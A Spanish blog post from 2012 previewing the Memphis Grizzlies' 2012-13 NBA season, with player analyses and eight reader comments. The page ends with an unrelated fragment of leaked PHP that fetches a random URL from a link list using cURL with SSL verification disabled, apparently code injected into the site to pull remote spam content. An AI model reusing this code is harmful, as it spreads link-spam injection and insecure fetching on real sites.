Memphis Grizzlies: las vistas desde el tejado

26 de October de 2012 por MagicJohnson32

La pirámide de cristal de The Pyramid Arena ilumina el atardecer. Un puñado de rascacielos jalonan un cielo, ya rojizo, que anuncia la inminente noche. Unos cuantos rótulos de neón parpadean con timidez. El rugido del motor de un Cadillac se mezcla con los acordes de “Suspicious Minds”. Y, de fondo, el Mississippi, siempre inconmensurable. Uno, que jamás ha estado en Memphis, imagina que las vistas desde un tejado deben de ser algo parecido a esto. Bonito para un rato, pero ya está.

Sirva lo anterior como metáfora de lo que son los Grizzlies, un equipo bonito para un rato -concretamente, para la regular season e incluso la primera ronda de Playoffs- pero ya está.

zach marc gay conleyLos Grizzlies han tocado techo y, desde donde están, las vistas no son nada despreciables. Por arriba solo quedan los candidatos a todo; por debajo, el resto. Se han consolidado como equipo de Playoffs en el Oeste con una plantilla que es, en buena medida, consecuencia del que en su momento fue considerado de manera casi unánime como el peor traspaso de la historia del deporte profesional. Sin un auténtico jugador franquicia y ante las lesiones de algunas de sus estrellas, los Grizzlies han hecho del bloque su fortaleza. Esta será una temporada más, esta 2012-2013, su principal cualidad, aunque también su cruz.

El grupo volverá a estar encabezado por Rudy Gay, Marc Gasol, Zach Randolph y Mike Conley. Todos ellos han ampliado en los últimos dos años sus contratos con la franquicia de Tennessee, que de esta manera no ha tenido opción de hacerse con ninguno de los grandes nombres del mercado. De hecho, la marcha de O.J. Mayo ha sido lo más notable de una off season que para los Grizzlies ha sido una balsa de aceite, al menos en términos deportivos, porque en lo institucional la franquicia está a un paso de ser adquirida por un grupo encabezado por el multimillonario Robert Pera y en el que destacan nombres como Penny Hardaway, el quarterback Peyton Manning y el actor-cantante Justin Timberlake. El acuerdo entre el hasta ahora propietario, Michael Haisley, y Robert Pera incluye una cláusula según la cual los Grizzlies permanecerán en Memphis durante al menos 15 años más, por lo que la venta ha de entenderse como buenas noticias para el equipo y la ciudad.

Volviendo al plano puramente deportivo, la franquicia ha optado por una batería de jugadores que deberían ser capaces de compensar la ausencia del que venía siendo sexto hombre. Jerryd Bayless llega tras rescatar en Toronto parte del prestigio con el que llegó a la liga y que no pudo hacer valer en Portland. Con cualidades ofensivas de escolta y un cuerpo más propio de un base, Bayless aportará una rotación de cierta calidad en el 1-2, algo que los Grizzlies venían echando en falta desde que traspasaron a Greivis Vasquez. A diferencia de Vasquez, Bayless no es un organizador pero puede aportar al juego de los Grizzlies un punto de impredecibilidad adecuado para momentos de atasco. Sin embargo, sus problemas defensivos, especialmente dramáticos cuando ejerce de escolta, pueden restarle minutos de juego.

Más claro parece el rol de Wayne Ellington: si el escolta mete sus triples, jugará; si no los mete, no jugará. Por lo visto hasta la fecha, todo apunta a lo segundo. A eso parece reducirse la carrera del producto de North Carolina,  incapaz de evolucionar un ápice en sus tres temporadas en los Wolves, desde donde llegó a cambio de Dante Cunningham. Ellington no rebotea, no roba balones, no asiste y es un defensor justito. En Memphis no se le pedirá más que anotar cuando esté solo, algo que no muchos jugadores del banquillo Grizzly fueron capaces de hacer la pasada campaña. Salvo sorpresa o que la rodilla izquierda de Tony Allen se resienta, será difícil que Ellington tenga un papel destacado. No descartaríamos, incluso, que el sophomore Josh Shelby le supere en las rotaciones, dado el potencial que mostró con su espectacular actuación en la Summerleague de Las Vegas. Y si hablamos de potencial, no hay que olvidar al rookie Tony Wroten, base de casi dos metros de estatura capaz de anotar cerca del aro y de rebotear como un alero, pero con tendencia a la precipitación y horroroso en el tiro de larga distancia.

Tony AllenDe inicio, por delante de todos ellos, estará la mejor pareja de ladrones de la liga: Mike Conley y Tony Allen. Se trata, en ambos casos, de jugadores de los que sabemos perfectamente qué esperar. Conley se ha consolidado como un dignísimo base titular, de los que aplican con éxito la lógica de ‘cuantos menos riesgos, menos errores’. Su extraordinaria habilidad para las recuperaciones (su promedio en este apartado subió por quinto año consecutivo) queda en parte eclipsada por su incapacidad para coger rebotes y anotar con fiabilidad desde media distancia. Conley anota los triples con consistencia y garantiza uno de los mejores ratios asistencias/pérdidas de la NBA. El caso de Allen es incluso más extremo: excelente defensor en las posiciones de 2-3, muy buen recuperador, pero negado en ataque estático: posee uno de los peores dribblings de entre los jugadores exteriores de la liga y es incapaz de anotar una suspensión.

Rudy Gay dunkEl frontcourt de los Grizzlies estará de nuevo encabezado por los tres mejores jugadores de la plantilla. Rudy Gay, teniendo en cuenta que estaba de vuelta tras la lesión que sufrió en 2011, completó una buena temporada pasada. Sigue, sin embargo, a medio camino entre la estrella indiscutible que sus condiciones nos hacen intuir en él y el cáncer para el equipo que algunos por estos lares le acusan de ser. Ni una cosa ni otra. En Gay ha recaído con frecuencia la responsabilidad en los momentos críticos, y no siempre ha acertado pero jamás la ha rehuido. El principal problema de Gay es que resulta enormemente previsible y, una vez recibe e inicia el movimiento hacia el aro, la defensa puede descartar el pase y concentrarse en dificultarle el tiro y cerrar el rebote. Gay es, por otra parte, un más que correcto defensor, uno de los mejores finalizadores de contraataques del planeta y poseedor de un físico privilegiado que le permite lanzar por encima del defensor casi en cualquier situación, cuando no sencillamente machacarle en la cara.

Tal vez la incógnita que determine el resultado de esta ecuación que son los Grizzlies la encontremos en el rendimiento de su pareja interior titular. Especialmente trascendente serán las condiciones en que se encuentre Zach Randolph, que se perdió buena parte de la última regular season y que jamás recuperó el espectacular nivel de la 2010-2011, cuando condujo a los Grizzlies hasta el séptimo partido de la segunda ronda de Playoffs. Randolph ya está en 31 años pero asegura que la rodilla está al 100% y su pretemporada invita al optimismo. Si el físico acompaña, el talento sabemos que está ahí.

zach marcSi de algo valió la lesión del ala-pívot fue para devolver a Marc Gasol parte del protagonismo perdido. Marc lanzó y asistió más que nunca y, aunque perdió efectividad (a causa de la ausencia de Randolph y de un cierto abuso de su irregular tiro de media-larga distancia), recuperó galones y probó como merecida su multimillonaria renovación. Excelente defensor y reboteador defensivo, Gasol aporta además una gran visión del juego desde el poste medio-bajo.

Las novedades en este apartado se limitan a la llegada del pívot Jerome Jordan como fondo de armario y el regreso de Darrell Arthur tras una temporada lesionado por una rotura del tendón de Aquiles. Arthur ha vuelto a lesionarse en esta pretemporada y, aunque se espera que esté listo para el inicio de la regular season, queda por ver que pueda retomar su evolución donde la dejó en la campaña 2010-2011, cuando se reveló como una excelente primera rotación interior. Este año tendrá que competir con Marreese Speights, de condiciones casi opuestas a las de Arthur y que se ganó sus minutos como sustituto de Zach Randolph cuando este cayó lesionado al inicio de 2012. El ex Sixer es un especialista del catch-and-shoot muy capaz de anotar desde 5-6 metros pero sin apenas juego de espaldas al aro ni capacidad atlética y que no da una asistencia ni por equivocación.

conley hollinsTambién sigue Haddadi, con nuevo contrato para seguir en el que hasta la fecha es su único equipo en la NBA. El gigante iraní es un jugador claramente limitado por su falta de movilidad, pero cumple con creces en su rol de recurso de emergencia ante pívots grandes y los ocasionales problemas de faltas de Marc Gasol. Por último, el recambio para Rudy Gay será de nuevo Quincy Pondexter, sólido defensor pero de mínima contribución ofensiva.

Al frente del banquillo se mantiene Lionel Hollins, lo que no hace sino reforzar la idea de que veremos un equipo muy reconocible en la inminente temporada. En resumen, los Grizzlies encaran la 2012-2013 con su condición de equipo de Playoffs intacta, sin más margen de mejora que el que la salud de sus jugadores pueda suponer y con el objetivo de cumplir con unas expectativas que no alcanzan más allá de una posible segunda ronda, algo que, por otra parte, ya quisieran muchos otros equipos para sí. Así es la vida desde lo alto de un tejado de Memphis.

Altas: Jarryd Bayless, Wayne Ellington, Tony Wroten, Jerome Jordan.
Bajas: O.J. Mayo, Dante Cunningham, Gilbert Arenas.

Quinteto: Mike Conley, Tony Allen, Rudy Gay, Zach Randolph y Marc Gasol.
Sexto hombre: Bayless/Speights

Comenta

8 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    E-X-C-E-L-E-N-T-E

    Símplemente, absolutamenta nada que añadir, ni una coma que quitar. Todo perfecto.

    En serio, los análisis que nos marcamos aquí no se ven en ninguna otra jodida página de internet. Seguramente en la revista NBA pagando, pero ya digo, ni en solobasket, nbamaniacs ni pollas en vinagre. Es acojonante los textos que nos curramos, además aquí el maestro Magic haciéndole sitio al nuevo periodismo de gran calidad (y él, que ha estudiado la carrera, sabe a qué me refiero con nuevo periodismo).

    Pues nada, comentaré un poco mis impresiones, pero a priori totalmente de acuerdo. Hombre, no sé qué pasó con Mayo. Estaba claro que él quería ser titular, y en realidad, yo le habría dicho que sí, con Allen de sexto hombre. La verdad, tienen que tene fe ciega absolutamente en Selby. Bayless es un agitador de pabellones, un microhondas, pero nada más, Wroten está por ver y Ellignton un tirador, nada más. Me parece un backourt muy pobre si tenemos en cuenta el tonelaje del frontcourt. Gay ya sabeis que no es santo de mi devoción. No es un jugador franquicia a mi juicio, pero bueno. Y en la pintura, está de pútisima madre. Me gusta mucho la incorporación de Jordan, un pavo que curra y que hizo una buena temporada en los Nets el año pasado, y me gusta mucho la batalla por minutos Arthur vs Speights. En realidad, yo intentaría un traspaso con Speights o Randolph a cambio de un escolta. Aunque uno nunca sabe, ya se sabe aquello de… tápate por arriba, destápate por abajo. Salvo equipos como Lakers, Celtics, Spurs y demás, el resto muchas veces no pueden permitirse quintetos de auténtico lujo.

    Además, ya sabeis lo que pienso yo de Conley, intentaría también un traspaso por él… Ya digo, perfecto análisis, a los Memphis les cojea seriamente el puesto de 2, la clave Josh Selby. Crack Magic!!

      Citar

  2. GreenPride dice:
    #2

    Los osos se aprestan a una temporada en la que las expectativas hacia ellos han caido bastante respecto al año pasado. Tras los grandes PO que realizaron en 20101sin Gay se espera de ellos un asalto a la élite el año pasado pero la falta de continuidad de Randolph y en general la falta de acomplamiento de sus piezas no les permitieron dar el salto estrellándose en primera ronda contra los Clippers. Este año con muchos equipos del Oeste reforzados no parece que puedan asaltar las primeras 4 plazas en la regular en su conferencia, lo que les dejaría en 5º o 6º y yo creo que fuera en primera ronda.
    Su principal problema es que sus exteriores buenos no dan una por fuera. Ni Conley, ni Tony Allen son fialbes lanzadores y Bayless no va a a arreglar el problema, más aún cuando es el recambio del único tirador medio fiable que tenían que era OJ Mayo. Por tanto su futuro dependerá de lo que puedan hacer sus interiores sobre todo Randolph y Gasol y de cómo sea la temporada de Gay. Éste está en el momento decisivo de su carrera, o da ya el salto definitivo al estrellato o nunca lo hará. Arthur y Speights son buenos recambios pero los recambios exteriores parecen bastante inferiores.
    En definitiva los Grizzlies deben defender a muerte las líneas de pase para intentar pescar el máximo número de puntos fáciles y en caso de ataques estáticos confiarllo todo a su frontcourt pero yo sinceramente no les veo pasando la primera ronda este año. ¿Año de transición en Memphis?

      Citar

  3. nba dice:
    #3

    Wroten en cierta manera tiene los mismo defectos que tiene Ricky, como desde pequeño tenia asombrosa facilidad para entrar hacia canasta, dada su embergadura, el tiro lejano no es un arma lejana que haya tenido que desarrollar, pero ahora con los armarios a los que se va a tener que enfrentar en la pintura no va a ser algo tan sencillo, por lo que supongo que se pondra las pilas o se dedicara sino a calentar el banquillo..La lucha por entrar en playoff de estos va a ser durisima, ya que yo creo que han perdido calidad con las salidas que han tenido
    Cambiando de tercio, partidito de Lakers, cualquiera que no haya visto jugar a Pau en los JJOO, pensara que a este se le ha olvidado jugar al basket,, y pensar que ha sido jugador franquicia en Memphis y en la seleccion, rookie del año, etc…
    ding, dong , han cantado linea, menudo rosco mas grande se han marcado los Lakers, parece que les gusta vivir en un culembron continuo, pues como no ganen a Mavs, ya veo a Brown de patitas en la calle.

      Citar

  4. MagicJohnson32 dice:
    #4

    Vaya, se me ha olvidado poner el pronóstico. Bueno, queda bastante claro en el texto ¿no? Dando guerra en primera ronda de Playoffs, y poco más.

    Gracias, Sancho, muchas gracias. Lo de “nuevo periodismo” es lo más bonito que me han dicho en mi vida, jaja. Tú sí que sabes hacer que uno se sonroje :p Aunque ya tengo asumido que el nuevo “nuevo periodismo” consiste en hacer periodismo sin cobrar por ello…

      Citar

  5. Sancho88 dice:
    #5

    jejeje. Exacto. Línea. Bingo. Pleno al 15. Correcto. No hay otra…

      Citar

  6. Jabho dice:
    #6

    Muy buen equipo pero le falta un pasito como habéis comentado. Yo mandaría a Gay a alguna parte a cambio de un par de jugadores que puedan anotar por fuera….

      Citar

  7. M dice:
    #7

    Buenísimo análisis. Un equipo fiable, pero predecible, a expensas de su forma física. En su mejor versión, pueden competir bien en una segunda ronda…y con randolph bien, ojo. Pero sí, soy consciente de que uno necesita demasiadas condiciones para aventurarse en un mejor pronóstico.

    Enhorabuena. Un saludo 🙂

      Citar

  8. Luis H. dice:
    #8

    Difiero en un jugador: Pondexter. No creo que ofensivamente sea manco, varios partidos se ha ido más allá de la decena de puntos en diversos equipos. Me parece bastante útil. Y Wroten tendrá que adaptarse, pero puede servir. Veremos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>